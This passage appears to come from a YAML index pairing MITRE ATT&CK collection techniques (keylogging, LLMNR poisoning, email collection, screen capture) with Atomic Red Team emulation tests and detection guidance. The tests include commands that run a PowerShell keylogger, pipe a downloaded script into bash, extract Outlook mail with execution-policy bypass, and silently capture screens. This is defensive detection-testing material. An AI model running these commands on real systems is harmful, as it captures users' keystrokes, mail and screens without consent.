- description: 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth
- look into keyloggers on Windows. Retrieved April 27, 2016.'
- source_name: Adventures of a Keystroke
- description: Adversaries may use methods of capturing user input to obtain credentials
- or collect information. During normal system usage, users often provide credentials
- to various different locations, such as login pages/portals or system dialog
- boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential
- API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving
- the user into providing input into what they believe to be a genuine service
- (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).
- name: Input Capture
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-24T21:29:13.900Z'
- created: '2017-05-31T21:30:48.323Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - John Lambert, Microsoft Threat Intelligence Center
- x_mitre_data_sources:
- - Windows Registry
- - Windows event logs
- - User interface
- - Process command-line parameters
- - Process monitoring
- - PowerShell logs
- - Loaded DLLs
- - Kernel drivers
- - DLL monitoring
- - Binary file metadata
- - API monitoring
- x_mitre_detection: 'Detection may vary depending on how input is captured but
- may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
- `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
- monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059),
- and ensuring no unauthorized drivers or kernel modules that could indicate
- keylogging or API hooking are present.'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- atomic_tests: []
- T1056.001:
- technique:
- id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4
- description: |-
- Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.
-
- Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
-
- * Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
- * Reading raw keystroke data from the hardware buffer.
- * Windows Registry modifications.
- * Custom drivers.
- name: Keylogging
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1056.001
- url: https://attack.mitre.org/techniques/T1056/001
- - external_id: CAPEC-568
- source_name: capec
- url: https://capec.mitre.org/data/definitions/568.html
- - url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
- description: 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth
- look into keyloggers on Windows. Retrieved April 27, 2016.'
- source_name: Adventures of a Keystroke
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-24T20:45:52.998Z'
- created: '2020-02-11T18:58:11.791Z'
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: 'Keyloggers may take many forms, possibly involving modification
- to the Registry and installation of a driver, setting a hook, or polling to
- intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`,
- and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry
- and file system for such changes, monitor driver installs, and look for common
- keylogging API calls. API calls alone are not an indicator of keylogging,
- but may provide behavioral data that is useful when combined with other information
- such as new files written to disk and unusual processes.'
- x_mitre_permissions_required:
- - Administrator
- - root
- - SYSTEM
- - User
- x_mitre_data_sources:
- - Windows Registry
- - Process monitoring
- - API monitoring
- identifier: T1056.001
- atomic_tests:
- - name: Input Capture
- auto_generated_guid: d9b633ca-8efb-45e6-b838-70f595c6ae26
- description: |
- Utilize PowerShell and external resource to capture keystrokes
- [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1)
- Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1)
-
- Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log.
- supported_platforms:
- - windows
- input_arguments:
- filepath:
- description: Name of the local file, include path.
- type: Path
- default: "$env:TEMP\\key.log"
- executor:
- command: |
- Set-Location $PathToAtomicsFolder
- .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath}
- cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
-
-'
- name: powershell
- elevation_required: true
- T1557.001:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1557.001
- url: https://attack.mitre.org/techniques/T1557/001
- - url: https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution
- description: Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution.
- Retrieved November 17, 2017.
- source_name: Wikipedia LLMNR
- - url: https://technet.microsoft.com/library/cc958811.aspx
- description: Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November
- 17, 2017.
- source_name: TechNet NetBIOS
- - source_name: byt3bl33d3r NTLM Relaying
- url: https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
- description: Salvati, M. (2017, June 2). Practical guide to NTLM Relaying
- in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February
- 7, 2019.
- - source_name: Secure Ideas SMB Relay
- url: https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html
- description: Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays
- Should Be On Your Mind. Retrieved February 7, 2019.
- - url: https://github.com/nomex/nbnspoof
- description: Nomex. (2014, February 7). NBNSpoof. Retrieved November 17, 2017.
- source_name: GitHub NBNSpoof
- - url: https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response
- description: Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017.
- source_name: Rapid7 LLMNR Spoofer
- - url: https://github.com/SpiderLabs/Responder
- description: Gaffie, L. (2016, August 25). Responder. Retrieved November 17,
- 2017.
- source_name: GitHub Responder
- - url: https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning
- description: 'Sternstein, J. (2013, November). Local Network Attacks: LLMNR
- and NBT-NS Poisoning. Retrieved November 17, 2017.'
- source_name: Sternsecurity LLMNR-NBTNS
- - url: https://github.com/Kevin-Robertson/Conveigh
- description: Robertson, K. (2016, August 28). Conveigh. Retrieved November
- 17, 2017.
- source_name: GitHub Conveigh
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: LLMNR/NBT-NS Poisoning and SMB Relay
- description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
- spoof an authoritative source for name resolution to force communication with
- an adversary controlled system. This activity may be used to collect or relay
- authentication materials. \n\nLink-Local Multicast Name Resolution (LLMNR)
- and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve
- as alternate methods of host identification. LLMNR is based upon the Domain
- Name System (DNS) format and allows hosts on the same local link to perform
- name resolution for other hosts. NBT-NS identifies systems on a local network
- by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries
- can spoof an authoritative source for name resolution on a victim network
- by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know
- the identity of the requested host, effectively poisoning the service so that
- the victims will communicate with the adversary controlled system. If the
- requested host belongs to a resource that requires identification/authentication,
- the username and NTLMv2 hash will then be sent to the adversary controlled
- system. The adversary can then collect the hash information sent over the
- wire through tools that monitor the ports for traffic or through [Network
- Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes
- offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to
- obtain the plaintext passwords. In some cases where an adversary has access
- to a system that is in the authentication path between systems or when automated
- scans that use credentials attempt to authenticate to an adversary controlled
- system, the NTLMv2 hashes can be intercepted and relayed to access and execute
- code against a target system. The relay step can happen in conjunction with
- poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation:
- Secure Ideas SMB Relay)\n\nSeveral tools exist that can be used to poison
- name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).
- (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub
- Responder)"
- id: attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-31T13:54:08.239Z'
- created: '2020-02-11T19:08:51.677Z'
- x_mitre_contributors:
- - Eric Kuehn, Secure Ideas
- - Matthew Demaske, Adaptforward
- x_mitre_data_sources:
- - Windows event logs
- - Windows Registry
- - Packet capture
- - Netflow/Enclave netflow
- x_mitre_permissions_required:
- - User
- x_mitre_detection: |-
- Monitor HKLM\Software\Policies\Microsoft\Windows NT\DNSClient for changes to the "EnableMulticast" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)
-
- Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.
-
- Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Windows
- atomic_tests: []
- T1074.001:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1074.001
- url: https://attack.mitre.org/techniques/T1074/001
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Local Data Staging
- description: Adversaries may stage collected data in a central location or directory
- on the local system prior to Exfiltration. Data may be kept in separate files
- or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560).
- Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106)
- and bash may be used to copy data into a staging location.
- id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-05-26T19:23:54.854Z'
- created: '2020-03-13T21:13:10.467Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: |-
- Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
-
- Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- identifier: T1074.001
- atomic_tests:
- - name: Stage data from Discovery.bat
- auto_generated_guid: 107706a5-6f9f-451a-adae-bab8c667829f
- description: |
- Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
- verify that the file is saved in the temp directory.
- supported_platforms:
- - windows
- input_arguments:
- output_file:
- description: Location to save downloaded discovery.bat file
- type: Path
- default: "$env:TEMP\\discovery.bat"
- executor:
- command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat"
- -OutFile #{output_file}
-
-'
- cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore
-
-'
- name: powershell
- - name: Stage data from Discovery.sh
- auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066
- description: 'Utilize curl to download discovery.sh and execute a basic information
- gathering shell script
-
-'
- supported_platforms:
- - linux
- - macos
- input_arguments:
- output_file:
- description: Location to save downloaded discovery.bat file
- type: Path
- default: "/tmp/T1074.001_discovery.log"
- executor:
- command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
- | bash -s > #{output_file}
-
-'
- name: bash
- - name: Zip a Folder with PowerShell for Staging in Temp
- auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a
- description: |
- Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
- was placed in the temp directory.
- supported_platforms:
- - windows
- input_arguments:
- output_file:
- description: Location to save zipped file or folder
- type: Path
- default: "$env:TEMP\\Folder_to_zip.zip"
- input_file:
- description: Location of file or folder to zip
- type: Path
- default: PathToAtomicsFolder\T1074.001\bin\Folder_to_zip
- executor:
- command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file}
- -Force
-
-'
- cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore
-
-'
- name: powershell
- T1114.001:
- technique:
- created: '2020-02-19T18:46:06.098Z'
- modified: '2020-03-24T17:59:20.983Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- type: attack-pattern
- id: attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004
- description: |-
- Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
-
- Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\\Documents\Outlook Files` or `C:\Users\\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files)
- name: Local Email Collection
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1114.001
- url: https://attack.mitre.org/techniques/T1114/001
- - source_name: Outlook File Sizes
- url: https://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/
- description: N. O'Bryan. (2018, May 30). Managing Outlook Cached Mode and
- OST File Sizes. Retrieved February 19, 2020.
- - source_name: Microsoft Outlook Files
- url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
- description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
- .ost). Retrieved February 19, 2020.
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
- - Authentication logs
- - Mail server
- x_mitre_detection: Monitor processes and command-line arguments for actions
- that could be taken to gather local email files. Monitor for unusual processes
- accessing local email files. Remote access tools with built-in features may
- interact directly with the Windows API to gather information. Information
- may also be acquired through Windows system management tools such as [Windows
- Management Instrumentation](https://attack.mitre.org/techniques/T1047) and
- [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- identifier: T1114.001
- atomic_tests:
- - name: Email Collection with PowerShell Get-Inbox
- auto_generated_guid: 3f1b5096-0139-4736-9b78-19bcb02bb1cb
- description: |
- Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
- Successful execution will produce stdout message stating "Please be patient, this may take some time...". Upon completion, final output will be a mail.csv file.
-
- Note: Outlook is required, but no email account necessary to produce artifacts.
- supported_platforms:
- - windows
- input_arguments:
- output_file:
- description: Output file path
- type: String
- default: "$env:TEMP\\mail.csv"
- file_path:
- description: File path for Get-Inbox.ps1
- type: String
- default: PathToAtomicsFolder\T1114.001\src
- dependency_executor_name: powershell
- dependencies:
- - description: 'Get-Inbox.ps1 must be located at #{file_path}
-
-'
- prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit
- 1}
-
-'
- get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1"
- -OutFile "#{file_path}\Get-Inbox.ps1"
-
-'
- executor:
- command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1
- -file #{output_file}
-
-'
- cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore
-
-'
- name: powershell
- T1185:
- technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1185
- external_id: T1185
- - url: https://en.wikipedia.org/wiki/Man-in-the-browser
- description: Wikipedia. (2017, October 28). Man-in-the-browser. Retrieved
- January 10, 2018.
- source_name: Wikipedia Man in the Browser
- - url: https://www.cobaltstrike.com/help-browser-pivoting
- description: Mudge, R. (n.d.). Browser Pivoting. Retrieved January 10, 2018.
- source_name: Cobalt Strike Browser Pivot
- - url: https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses
- description: De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME
- EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL
- BUSINESSES. Retrieved January 17, 2018.
- source_name: ICEBRG Chrome Extensions
- - url: https://cobaltstrike.com/downloads/csmanual38.pdf
- description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
- Retrieved May 24, 2017.
- source_name: cobaltstrike manual
- description: |-
- Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser)
-
- A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions)
-
- Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. (Citation: cobaltstrike manual)
- name: Man in the Browser
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-07-14T19:39:44.590Z'
- created: '2018-01-16T16:13:52.465Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Justin Warner, ICEBRG
- x_mitre_data_sources:
- - Authentication logs
- - Packet capture
- - Process monitoring
- - API monitoring
- x_mitre_detection: This is a difficult technique to detect because adversary
- traffic would be masked by normal user traffic. No new processes are created
- and no additional software touches disk. Authentication logs can be used to
- audit logins to specific web applications, but determining malicious logins
- versus benign logins may be difficult if activity matches typical user behavior.
- Monitor for process injection against browser applications
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Windows
- atomic_tests: []
- T1557:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1557
- url: https://attack.mitre.org/techniques/T1557
- - external_id: CAPEC-94
- source_name: capec
- url: https://capec.mitre.org/data/definitions/94.html
- - source_name: Rapid7 MiTM Basics
- url: https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/
- description: Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March
- 2, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Man-in-the-Middle
- description: |-
- Adversaries may attempt to position themselves between two or more networked devices using a man-in-the-middle (MiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)
-
- Adversaries may leverage the MiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.
- id: attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-31T13:54:08.535Z'
- created: '2020-02-11T19:07:12.114Z'
- x_mitre_contributors:
- - Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project
- x_mitre_detection: Monitor network traffic for anomalies associated with known
- MiTM behavior. Consider monitoring for modifications to system configuration
- files involved in shaping network traffic flow.
- x_mitre_data_sources:
- - File monitoring
- - Netflow/Enclave netflow
- - Packet capture
- x_mitre_permissions_required:
- - User
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- atomic_tests: []
- T1074.002:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1074.002
- url: https://attack.mitre.org/techniques/T1074/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
- April 24, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Remote Data Staging
- description: |-
- Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
-
- In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
-
- By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.
- id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-06-24T18:59:15.833Z'
- created: '2020-03-13T21:14:58.206Z'
- x_mitre_contributors:
- - Praetorian
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: |-
- Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
-
- Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - AWS
- - GCP
- - Azure
- atomic_tests: []
- T1114.002:
- technique:
- created: '2020-02-19T18:52:24.547Z'
- modified: '2020-02-19T20:53:50.908Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- type: attack-pattern
- id: attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a
- description: Adversaries may target an Exchange server or Office 365 to collect
- sensitive information. Adversaries may leverage a user's credentials and interact
- directly with the Exchange server to acquire information from within a network.
- Adversaries may also access externally facing Exchange services or Office
- 365 to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413)
- can be used to automate searches for specific keywords.
- name: Remote Email Collection
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1114.002
- url: https://attack.mitre.org/techniques/T1114/002
- x_mitre_platforms:
- - Office 365
- - Windows
- x_mitre_data_sources:
- - Authentication logs
- - Email gateway
- - Mail server
- - Office 365 trace logs
- x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
- locations, especially for privileged accounts (ex: Exchange administrator
- account).'
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- atomic_tests: []
- T1113:
- technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1113
- url: https://attack.mitre.org/techniques/T1113
- - external_id: CAPEC-648
- source_name: capec
- url: https://capec.mitre.org/data/definitions/648.html
- - source_name: CopyFromScreen .NET
- url: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8
- description: Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved
- March 24, 2020.
- - url: https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/
- description: Thomas Reed. (2017, January 18). New Mac backdoor using antiquated
- code. Retrieved July 5, 2017.
- source_name: Antiquated Mac Malware
- description: 'Adversaries may attempt to take screen captures of the desktop
- to gather information over the course of an operation. Screen capturing functionality
- may be included as a feature of a remote access tool used in post-compromise
- operations. Taking a screenshot is also typically possible through native
- utilities or API calls, such as CopyFromScreen, xwd,
- or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated
- Mac Malware)
-
-'
- name: Screen Capture
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-24T19:56:37.627Z'
- created: '2017-05-31T21:31:25.060Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - File monitoring
- x_mitre_detection: Monitoring for screen capture behavior will depend on the
- method used to obtain data from the operating system and write output files.
- Detection methods could include collecting information from unusual processes
- using API calls used to obtain image data, and monitoring for image files
- written to disk. The sensor data may need to be correlated with other events
- to identify malicious activity, depending on the legitimacy of this behavior
- within a given network environment.
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- identifier: T1113
- atomic_tests:
- - name: Screencapture
- auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac
- description: 'Use screencapture command to collect a full desktop screenshot
-
-'
- supported_platforms:
- - macos
- input_arguments:
- output_file:
- description: Output file path
- type: Path
- default: "/tmp/T1113_desktop.png"
- executor:
- command: 'screencapture #{output_file}
-
-'
- cleanup_command: 'rm #{output_file}
-
-'
- name: bash
- - name: Screencapture (silent)
- auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4
- description: 'Use screencapture command to collect a full desktop screenshot
-
-'
- supported_platforms:
- - macos
- input_arguments:
- output_file:
- description: Output file path
- type: Path
- default: "/tmp/T1113_desktop.png"
- executor:
- command: 'screencapture -x #{output_file}
-
-'
- cleanup_command: 'rm #{output_file}
-
-'
- name: bash
- - name: X Windows Capture
- auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac
- description: 'Use xwd command to collect a full desktop screenshot and review
- file with xwud
-
-'
- supported_platforms:
- - linux
- input_arguments:
- output_file:
- description: Output file path
- type: Path
- default: "/tmp/T1113_desktop.xwd"
- executor:
- command: |
- xwd -root -out #{output_file}
- xwud -in #{output_file}
- cleanup_command: 'rm #{output_file}
-
-'
- name: bash
- - name: Capture Linux Desktop using Import Tool
- auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1
- description: 'Use import command from ImageMagick to collect a full desktop
- screenshot
-
-'
- supported_platforms:
- - linux
- input_arguments:
- output_file:
- description: Output file path
- type: Path
- default: "/tmp/T1113_desktop.png"
- dependencies:
- - description: 'ImageMagick must be installed
-
-'
